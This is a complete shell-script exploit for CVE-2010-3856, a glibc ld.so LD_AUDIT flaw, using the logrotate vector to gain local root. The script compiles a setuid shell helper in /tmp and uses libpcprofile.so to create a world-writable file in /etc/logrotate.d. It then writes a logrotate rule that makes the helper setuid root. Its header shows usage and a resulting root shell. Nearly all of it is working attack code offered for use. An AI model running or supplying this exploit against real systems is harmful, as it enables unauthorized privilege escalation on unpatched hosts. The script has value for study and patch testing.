#!/bin/sh

#
# $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:05:15 raptor Exp $
#
# raptor_ldaudit2 - another glibc ld.so exploit (logrotate)
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment 
# variable to reference dynamic shared objects (DSOs) as audit objects, which 
# allows local users to gain privileges by leveraging an unsafe DSO located in 
# a trusted library directory, as demonstrated by libpcprofile.so 
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# This exploit uses the logrotate attack vector. See also the cron.d version
# available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit
#
# Usage:
# $ chmod +x raptor_ldaudit2
# $ ./raptor_ldaudit2
# [...]
# Everything looks fine.
# Just wait until logrotate is run and check /tmp/pwned.
# [...]
# $ /tmp/pwned 
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1# 
# [don't forget to delete /tmp/pwned* and /var/log/runme*!]
# 
# Vulnerable platforms:
# Slackware 13.1	[tested]
# openSUSE 11.3		[untested]
# Fedora Core 13	[untested]
# RHEL/CentOS 5		[untested]
# Ubuntu 10		[untested]
# [...]
#

echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo

# prepare setuid shell helper to circumvent bash checks
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
	echo "Error: Problems compiling setuid shell helper, check your gcc."
	exit 1
fi

# create a fake log file in /var/log
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null

# do the magic!
runme="/etc/logrotate.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "Error: Not vulnerable or wrong attack vector? See comments."
	exit 1
fi

# build the logrotate script
echo "/var/log/runme {"						>  $runme
echo "daily"							>> $runme
echo "size=0"							>> $runme
echo "firstaction"						>> $runme
echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme"	>> $runme
echo "endscript"						>> $runme
echo "}"							>> $runme

# legen -- wait for it -- dary!
echo "Everything looks fine."
echo "Just wait until logrotate is run and check /tmp/pwned."